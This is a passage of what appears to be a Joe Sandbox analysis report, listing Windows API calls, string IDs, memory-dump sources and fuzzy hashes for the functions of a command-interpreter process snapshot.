• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 00EF0695
• GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 00EF06D3
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00EF06FB
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 00EF0717
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00EFE89D
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: con
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 58404892-4257191772
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a9ae9c5596887eaff4dc3113105e0c20f4cf209179cd8e818b8ff5c65aae8d99
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c44d20b80114f6b6b7bcd98d8031d367f38e10778dc0259389c2a4eefb72e664
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9ae9c5596887eaff4dc3113105e0c20f4cf209179cd8e818b8ff5c65aae8d99
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21511671A0020CAFDB20DF649C48FFEB7B8EB85724F254229FA21F22D1D77199019B61
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A70,000000FF,00000000,?,00000001,?,?,?,00EF5833,?, /D /c",?,?,?,00000000,?), ref: 00F01271
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: longjmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?$8
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1832741078-4019693922
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1f1e90dffab06f1202418da611cc383d045d9119066252dc995e123f7c00b8d7
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b46129ee5069e054b7e28335132121487596ac2d383959f0e9b04143a7b63c8a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f1e90dffab06f1202418da611cc383d045d9119066252dc995e123f7c00b8d7
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43A1E475A0060CEBCF24DF15C98597E7B65FB953A4B20A016F602AB6E0CB70DD51FB81
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0C62E
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0C656
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00F0C6C7
                                                                                                                                                                                                                                                                                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00F0C6E6
                                                                                                                                                                                                                                                                                                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00F0C72A
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F0C747
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F0C76C
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F0C794
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 00F0C7B3
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 00F0C7C5
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                                                                                                                                                                                                      • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3510147486-2605508654
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 491cf2ec61df04d03cb53733b9eaf36123f9442536c44d90a990c952d5a3c9b4
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3d5ab0bbe4d611f0605137499f95a7f0874f169180315abbf44c3f571d07b3e9
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 491cf2ec61df04d03cb53733b9eaf36123f9442536c44d90a990c952d5a3c9b4
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 845153B1E002599BDB24DB65DC89AEFBBB8EF44354F0401A9E505E3181EB34DE84EF61
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmp
• String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
• API String ID: 2081463915-3124875276
• Opcode ID: e7aad97dae66de1cab2cf6216293afeed74b41038edbf74686a5ec4563ca4723
• Instruction ID: f2dd107d2517b95875c49b054efd33ba6687e167555acafd4b01f1e0f6c41d82
• Opcode Fuzzy Hash: e7aad97dae66de1cab2cf6216293afeed74b41038edbf74686a5ec4563ca4723
• Instruction Fuzzy Hash: 50412C3120438ED7D7386F27E8557BA33E4EB92728B24242ED102B50E2EBE6D445E716
APIs
• FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,00F20AF0,00002000,00000000,00000000,00000000,00000000), ref: 00EE7ED4
  • Part of subcall function 00EEA62F: wcschr.MSVCRT ref: 00EEA635
• FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,00F20AF0,00002000,?), ref: 00EE7F16
• _ultoa.MSVCRT ref: 00EFAFC9
• GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00EFAFDE
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00EFAFF3
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
• String ID: Application$System
• API String ID: 3538039442-3455788185
• Opcode ID: 9ed4581129c93ed266a4838934eab12045a9b7ddae4ff3de0be98c1646254c4a
• Instruction ID: 95160178d033c86c433ce073176e7ec84a00a487eafb240193f4692a74266bf5
• Opcode Fuzzy Hash: 9ed4581129c93ed266a4838934eab12045a9b7ddae4ff3de0be98c1646254c4a
• Instruction Fuzzy Hash: E641E3B274031DABEB209B65DC4AFBE77A9EB45750F101028F606FF281DA709D01DB51
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memsetwcschr$_wcsicmpiswspace
• String ID: :.\$=,;$=,;+/[] "
• API String ID: 1913572127-843887632
• Opcode ID: cb3adba76d44d4c03cd449947189e6f6e065ebe28477fb015ad2447aa49876c8
• Instruction ID: 4167708a2fd00c51c8e4b1d34bc40dbe421e5e8707a6a4e8f9a87070fdb9acc4
• Opcode Fuzzy Hash: cb3adba76d44d4c03cd449947189e6f6e065ebe28477fb015ad2447aa49876c8
• Instruction Fuzzy Hash: 38A1C330A0429D9BDB34CB6ADC88BB977B1BF44318F2422ACD90AB7391D7719D81DB51
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
• String ID: +-~!$/$/
• API String ID: 2191331888-1430673670
• Opcode ID: 6a92bb092e176c32102bc284f46703cf69eff4adc752f8603a4ea23ea4232ccd
• Instruction ID: 3f16ce11eecb9b695146e6d169d495c3441aac0465312b4165fd48baaba24d94
• Opcode Fuzzy Hash: 6a92bb092e176c32102bc284f46703cf69eff4adc752f8603a4ea23ea4232ccd
• Instruction Fuzzy Hash: 2851AC7140060DEBCB14EF64D8498FB37A9EF05324B219126FE16AB150EBB5DF01DBA1
APIs
  • Part of subcall function 00EE9E8E: iswspace.MSVCRT ref: 00EE9E9E
• wcsrchr.MSVCRT ref: 00F05406
• wcschr.MSVCRT ref: 00F0541C
• wcsrchr.MSVCRT ref: 00F0544C
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00F0546B
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F0547B
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F05497
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00F0549F
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F054B3
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00F054D4
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 00F05501
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F05557
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00F05578
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4166807220-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 696615629bab8dca039ee479af9e35bf691331874403ead2d25642f2a651c872
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5d6ee95c3b2ab09afe1bd514c29273ba7976d762f81776a29b039324488dacc0
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 696615629bab8dca039ee479af9e35bf691331874403ead2d25642f2a651c872
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7151C5319002189BDB34AB70DC197BA77E9FF00724F1484A9E486D21D1EFB48E81EF91
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00EE7669
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EE7670
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00EE7686
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EE768D
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EE7719
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EE772B
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EE7758
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EFAA79
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 435930816-3086019870
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: f629ef6e1fc0ca9f4cf29f402a4476c22aa6a06a283c72b43b23ff83a084d798
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f945de90152f634b7543ae04bb4a949c4b79b902e9f26b3c9a7e067019c796d2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f629ef6e1fc0ca9f4cf29f402a4476c22aa6a06a283c72b43b23ff83a084d798
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 665149712087899FD724DF36AC0597637D4EF04319B28546EE486EB291FF20D802DB66
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EE8FCD
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EE8FE3
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00EE9002
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE9013
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA62F: wcschr.MSVCRT ref: 00EEA635
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID: n
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2943530692-874609620
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: acf97c7ffa0ae4ee89f17254db14dc701703d555936635a7f1a97318321b845a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1cdb64cfc852305bba060f6cd1b94b9f529cd8a3aa5f992dc057e3af03aa8abd
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acf97c7ffa0ae4ee89f17254db14dc701703d555936635a7f1a97318321b845a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7C14831A0025D9BCF28DF7AC8852BAB3F5AF48358F24A029E606F72D1EB749D41D751
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0AF04
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0AF2E
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0AF58
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,00EE250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 00F0B08B
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00F0B095
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 00F0B0AA
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00F0B1DA
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00F0B1F2
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00F0B20A
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memset$ErrorLast$InformationVolume
• String ID: %04X-%04X
• API String ID: 2748242238-1126166780
• Opcode ID: 8a78a5d430e64dc464556fc5e505f1c78f462056a46eb0c3e4272599cf3c3bc8
• Instruction ID: 487a53c97657a33789815c416ac8f48296560be22ec6a2873bd9c7274e838ceb
• Opcode Fuzzy Hash: 8a78a5d430e64dc464556fc5e505f1c78f462056a46eb0c3e4272599cf3c3bc8
• Instruction Fuzzy Hash: 7C91A0B1E002299BDB24DB24CC95BEAB7B9EF54354F4405E9F509E3180EB349E84AF90
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: wcschr$iswspace
• String ID: =,;
• API String ID: 3458554142-1539845467
• Opcode ID: c60c979f844abd220d6e36a6ad8060dab82719014a3ca6285568193707383818
• Instruction ID: 8e121eb00ab648563d14c286fb1ae69e4e574575adf513e099cc96e23fcfbf73
• Opcode Fuzzy Hash: c60c979f844abd220d6e36a6ad8060dab82719014a3ca6285568193707383818
• Instruction Fuzzy Hash: 2181C57090029EC7DB309F56CC557BB73B5EF10309F24686AE94AB7250EB758D84CB61
APIs
• memset.MSVCRT ref: 00EF2431
• memset.MSVCRT ref: 00EF2452
• memset.MSVCRT ref: 00EF247C
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00EE250C,00000000,00000000,?,-00000105,-00000105,-00000105), ref: 00EF2585
• _wcsicmp.MSVCRT ref: 00EF25A3
• ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00EF25CA
• ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00EF25E3
• ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00EFF32B
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memset$InformationVolume_wcsicmp
• String ID: FAT
• API String ID: 4247940253-238207945
• Opcode ID: ddad1890b5e47c936335251dcb96c6898197afcbcceaa6c3d971707a0533075f
• Instruction ID: 46c788773e80e5ba1e1a18645af675052000ec8b4d481bc1e6fc99e867293f88
• Opcode Fuzzy Hash: ddad1890b5e47c936335251dcb96c6898197afcbcceaa6c3d971707a0533075f
• Instruction Fuzzy Hash: 7B5150B2A0021D9BEB24DB64DC95BFA77B8EB44305F1410ADE605F3191EB749E84CE25
APIs
• memset.MSVCRT ref: 00EE7381
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,?,00000000,?), ref: 00EE73D6
• wcsncmp.MSVCRT ref: 00EE73F9
• ??_V@YAXPAX@Z.MSVCRT(?,-00000209,?,00000000,?), ref: 00EE7465
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00001037,00000000,?,?), ref: 00EFA8C6
  • Part of subcall function 00EF0060: wcschr.MSVCRT ref: 00EF006C
• wcsstr.MSVCRT ref: 00EFA87E
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00EFA89B
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00EFA8DE
  • Part of subcall function 00EF589A: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?), ref: 00EF58BB
